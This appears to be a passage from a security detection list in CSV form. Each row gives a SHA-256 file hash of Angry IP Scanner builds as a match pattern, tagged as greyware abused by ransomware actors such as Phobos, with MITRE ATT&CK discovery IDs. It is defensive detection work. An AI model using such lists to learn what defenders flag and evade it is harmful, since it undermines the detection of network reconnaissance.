"*bc811e6d2c2df7fd2826ba0545a5a27f53d6da1420abfb8ff5ff8e0427a9317d*",".{0,1000}bc811e6d2c2df7fd2826ba0545a5a27f53d6da1420abfb8ff5ff8e0427a9317d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*bca3eca534819386df33cde502bcbb23224dc2f814979ca580be4ff2d4c80067*",".{0,1000}bca3eca534819386df33cde502bcbb23224dc2f814979ca580be4ff2d4c80067.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*bcbae8d4564f1c0933331c5e4c5b779a72d889504155e209e2aa942b963160b2*",".{0,1000}bcbae8d4564f1c0933331c5e4c5b779a72d889504155e209e2aa942b963160b2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*c049a837cfa5f098e27fbbe5904daa2cf3d21e6ad51b662b2ecc723c3abf6c6a*",".{0,1000}c049a837cfa5f098e27fbbe5904daa2cf3d21e6ad51b662b2ecc723c3abf6c6a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*c08c98dcc7973d70b4024299db6c96acb6ba060749af54da45724b6427d0d897*",".{0,1000}c08c98dcc7973d70b4024299db6c96acb6ba060749af54da45724b6427d0d897.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*c0f307cdba8e36664c10d7d7969bbd2d0e670503f33ae8b2ed693ede0f12f5b9*",".{0,1000}c0f307cdba8e36664c10d7d7969bbd2d0e670503f33ae8b2ed693ede0f12f5b9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*c36fe320b5868ebb899a79c09b3c7de43c887e00ad63ed34df6c47cd8fdb2919*",".{0,1000}c36fe320b5868ebb899a79c09b3c7de43c887e00ad63ed34df6c47cd8fdb2919.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*c3c3c9668033f2f2b272b6003bf9ecb9d0ba77a04f5dc0fe79a1d4b7a1f31366*",".{0,1000}c3c3c9668033f2f2b272b6003bf9ecb9d0ba77a04f5dc0fe79a1d4b7a1f31366.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*c4776bfa13df65546ba20938f68214281a2d1771ff0d5e89542e28d34c54933e*",".{0,1000}c4776bfa13df65546ba20938f68214281a2d1771ff0d5e89542e28d34c54933e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*c5063df64bd9604d8cdc0d20d4a1eb2340425cf7a38e126fbe45f3e210a1b6a8*",".{0,1000}c5063df64bd9604d8cdc0d20d4a1eb2340425cf7a38e126fbe45f3e210a1b6a8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*c6c3d2c485f517a417ed0303ec5af3888dcd3f31a90f7c0d959f01f4a540d61a*",".{0,1000}c6c3d2c485f517a417ed0303ec5af3888dcd3f31a90f7c0d959f01f4a540d61a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*c7304d8f23a7d129d30e27955a020357518164d01e60eb17b0db2768ceed435e*",".{0,1000}c7304d8f23a7d129d30e27955a020357518164d01e60eb17b0db2768ceed435e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*c7e26e0a8bbe91d86c363956c9d5d4d32b55f195c9a4970cfad4df2a07853013*",".{0,1000}c7e26e0a8bbe91d86c363956c9d5d4d32b55f195c9a4970cfad4df2a07853013.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*c8a45f4e2b59642d67abcd63f8c764b3b8fa2713bdbb1278aae427cb31cde4e0*",".{0,1000}c8a45f4e2b59642d67abcd63f8c764b3b8fa2713bdbb1278aae427cb31cde4e0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ca08f69443eb20365de2172255cc51e6be69ed93ef5edb79d870952fd68b500d*",".{0,1000}ca08f69443eb20365de2172255cc51e6be69ed93ef5edb79d870952fd68b500d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*caae7a70d2fe9e94e7870ec50278b0c4a115e7ffd6c87e7c729462019f973024*",".{0,1000}caae7a70d2fe9e94e7870ec50278b0c4a115e7ffd6c87e7c729462019f973024.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*cabc5f4b4dee64623a9a8493bad6c1fc6db5216caa5c904f78cc82d1d25645b7*",".{0,1000}cabc5f4b4dee64623a9a8493bad6c1fc6db5216caa5c904f78cc82d1d25645b7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*cac1286a56b2de1195d3b79ed029e68f827a1d4e8da914097dfce64584e407d0*",".{0,1000}cac1286a56b2de1195d3b79ed029e68f827a1d4e8da914097dfce64584e407d0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*cb5c6641c926bbcde9dc6306f2049aafa148ce393b974f2b7a0d7e0eafa811f7*",".{0,1000}cb5c6641c926bbcde9dc6306f2049aafa148ce393b974f2b7a0d7e0eafa811f7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*cba592d413d8cb3d09989b0b7693f3247517590d2e83329d4ae5f5b407fffc23*",".{0,1000}cba592d413d8cb3d09989b0b7693f3247517590d2e83329d4ae5f5b407fffc23.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*cc352c90f7f771ad36e224e1b3357be8da3d698f8ef3edc2ac4999dd843a5071*",".{0,1000}cc352c90f7f771ad36e224e1b3357be8da3d698f8ef3edc2ac4999dd843a5071.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*cc5f8c886d8fccf6571caa4954c7ec3e5ded2e8de3c06da6695c8ea755021cd4*",".{0,1000}cc5f8c886d8fccf6571caa4954c7ec3e5ded2e8de3c06da6695c8ea755021cd4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ccdbf9ce861c5032c54faa19c8addfb6a113acfc595851a4e3305d946f2abef5*",".{0,1000}ccdbf9ce861c5032c54faa19c8addfb6a113acfc595851a4e3305d946f2abef5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ccdf8f148f9d2245383d69a5d9c7d4a5595c2c7c31416927ebda1e3bc1d33941*",".{0,1000}ccdf8f148f9d2245383d69a5d9c7d4a5595c2c7c31416927ebda1e3bc1d33941.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*cd8c433651e8c1f9442c29ef575704a9a81168dd38e56ba882c02d1aa372c545*",".{0,1000}cd8c433651e8c1f9442c29ef575704a9a81168dd38e56ba882c02d1aa372c545.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*cdd530f38141348a294c13eec996195e8882d00d2ffb2b0ec89f58508fc3634d*",".{0,1000}cdd530f38141348a294c13eec996195e8882d00d2ffb2b0ec89f58508fc3634d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*cf700fa504e99bf418029192fdfe571eb19338f2a9053bb81ca082c714cf59d5*",".{0,1000}cf700fa504e99bf418029192fdfe571eb19338f2a9053bb81ca082c714cf59d5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*cf89753f97f44100d17ddac620231af952e70cb3f4fc02f410d3573be06b332e*",".{0,1000}cf89753f97f44100d17ddac620231af952e70cb3f4fc02f410d3573be06b332e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*d1a9af4f13225a46916c1d71c7645098a589ee5f9270aa018c915153c076b76f*",".{0,1000}d1a9af4f13225a46916c1d71c7645098a589ee5f9270aa018c915153c076b76f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*d21feb81faa65f44ab7c0c4c77d8e2fb012168ccec13b6b3aa63662812e14023*",".{0,1000}d21feb81faa65f44ab7c0c4c77d8e2fb012168ccec13b6b3aa63662812e14023.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*d252cafb581626c5cdf72411d66eab796336cb02f4813b11ac34f628a603e482*",".{0,1000}d252cafb581626c5cdf72411d66eab796336cb02f4813b11ac34f628a603e482.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*d2ec114cf44c9e15b158efd61850595daa1bc199732cb017d32abc19d66d4f9e*",".{0,1000}d2ec114cf44c9e15b158efd61850595daa1bc199732cb017d32abc19d66d4f9e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*d3ae15d4a9cc5c19e380cea606bc247b3765f93928dd7ae2d03e1f0a4f623db9*",".{0,1000}d3ae15d4a9cc5c19e380cea606bc247b3765f93928dd7ae2d03e1f0a4f623db9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*d3fc4d5bc4e176a51422c1cc9fc882b6ee646b0aa57dbb59feb42fa3c85783e8*",".{0,1000}d3fc4d5bc4e176a51422c1cc9fc882b6ee646b0aa57dbb59feb42fa3c85783e8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*d4016a747a083cd6a02f81fc980adf7b318c625a00227ef9a216706318800165*",".{0,1000}d4016a747a083cd6a02f81fc980adf7b318c625a00227ef9a216706318800165.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*d5c8fbea45f7ce94a5c4753e733ef530aae702a90eb67d7ac00faa8a9e8e9024*",".{0,1000}d5c8fbea45f7ce94a5c4753e733ef530aae702a90eb67d7ac00faa8a9e8e9024.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*d6430b77260fe3cd4fde6422317cbf232f7af5e29bd81267d10f48b01afec850*",".{0,1000}d6430b77260fe3cd4fde6422317cbf232f7af5e29bd81267d10f48b01afec850.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*d6d55eb0eabd43a50f6de2f77b7b67e2136578e8d5ab0dfbbefe21bda3937e91*",".{0,1000}d6d55eb0eabd43a50f6de2f77b7b67e2136578e8d5ab0dfbbefe21bda3937e91.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*d8aa3176d3cdb0deede2becaa1c383db0c78404f829c2dd06de86736fde68a09*",".{0,1000}d8aa3176d3cdb0deede2becaa1c383db0c78404f829c2dd06de86736fde68a09.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*dbe98c8b66436859514f07786c6903ca2805083615201adc1d1d63d1fa66d14b*",".{0,1000}dbe98c8b66436859514f07786c6903ca2805083615201adc1d1d63d1fa66d14b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*dc1c0ca64990cbd3f509f404f6cdef395895bed206de7d320052267586bdf416*",".{0,1000}dc1c0ca64990cbd3f509f404f6cdef395895bed206de7d320052267586bdf416.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*dce52871edb60f241f17fc6a43f236ab53b4b42813c1af0de929ec261eca2637*",".{0,1000}dce52871edb60f241f17fc6a43f236ab53b4b42813c1af0de929ec261eca2637.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*df2bca8190a27477227f92a6825dce00fda7e2f5c2a2a3da67638b016ff62502*",".{0,1000}df2bca8190a27477227f92a6825dce00fda7e2f5c2a2a3da67638b016ff62502.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*df331b6bcc463f2caae8c4d892f473e2a4a37a8970cc8e38a776735d6feaa140*",".{0,1000}df331b6bcc463f2caae8c4d892f473e2a4a37a8970cc8e38a776735d6feaa140.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*dfb3aea9e6fe5eccecfaf6e280416d9c93b0b2d89a0094cb83e19002197c851b*",".{0,1000}dfb3aea9e6fe5eccecfaf6e280416d9c93b0b2d89a0094cb83e19002197c851b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*dfca25f7d51972cf38fe3340b8e9967c67532d5bc6d776c0284b741433c94184*",".{0,1000}dfca25f7d51972cf38fe3340b8e9967c67532d5bc6d776c0284b741433c94184.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e1c6aea6094d317f351d9260fd6ea1a148f8a102c919c7067e2d39cd1016a8f7*",".{0,1000}e1c6aea6094d317f351d9260fd6ea1a148f8a102c919c7067e2d39cd1016a8f7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e1e0d3e30646550711722e8794192b05aa51adea9e4e02941ac19e67fbbc4c0f*",".{0,1000}e1e0d3e30646550711722e8794192b05aa51adea9e4e02941ac19e67fbbc4c0f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*e31519c2fa99c4739269b273268b45293a7f02b98a71426028cb37d4ffad95ca*",".{0,1000}e31519c2fa99c4739269b273268b45293a7f02b98a71426028cb37d4ffad95ca.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e37228d7dc5e4766d9070bca5f0d616ae04887d7f6ee7b30cc8ea5a0190c7441*",".{0,1000}e37228d7dc5e4766d9070bca5f0d616ae04887d7f6ee7b30cc8ea5a0190c7441.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e58805777cadba322e4e1b6a15969b34fbeddd0e473fe043f6fb976e71652b27*",".{0,1000}e58805777cadba322e4e1b6a15969b34fbeddd0e473fe043f6fb976e71652b27.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e60b16e124c84e2368a0bb9dd85a282a163ad1cc9946745ab14adcca5075d13f*",".{0,1000}e60b16e124c84e2368a0bb9dd85a282a163ad1cc9946745ab14adcca5075d13f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*e63896070e742e2f06c696a551b5cbf082acad80d48391b42cf2d040823793e6*",".{0,1000}e63896070e742e2f06c696a551b5cbf082acad80d48391b42cf2d040823793e6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e6d90023e2588a3c52798d2bee864c6e87066b6e8867b518c4f59c75a4d60cdc*",".{0,1000}e6d90023e2588a3c52798d2bee864c6e87066b6e8867b518c4f59c75a4d60cdc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e6e45b8cce5e26017e9c4033b2c9d21a32a30c850f13c39095f8aa2571241c81*",".{0,1000}e6e45b8cce5e26017e9c4033b2c9d21a32a30c850f13c39095f8aa2571241c81.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e746327fc595317f4fd949c7e46bdfcdcd70a74c9402dc65fef045ec8a2c621d*",".{0,1000}e746327fc595317f4fd949c7e46bdfcdcd70a74c9402dc65fef045ec8a2c621d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
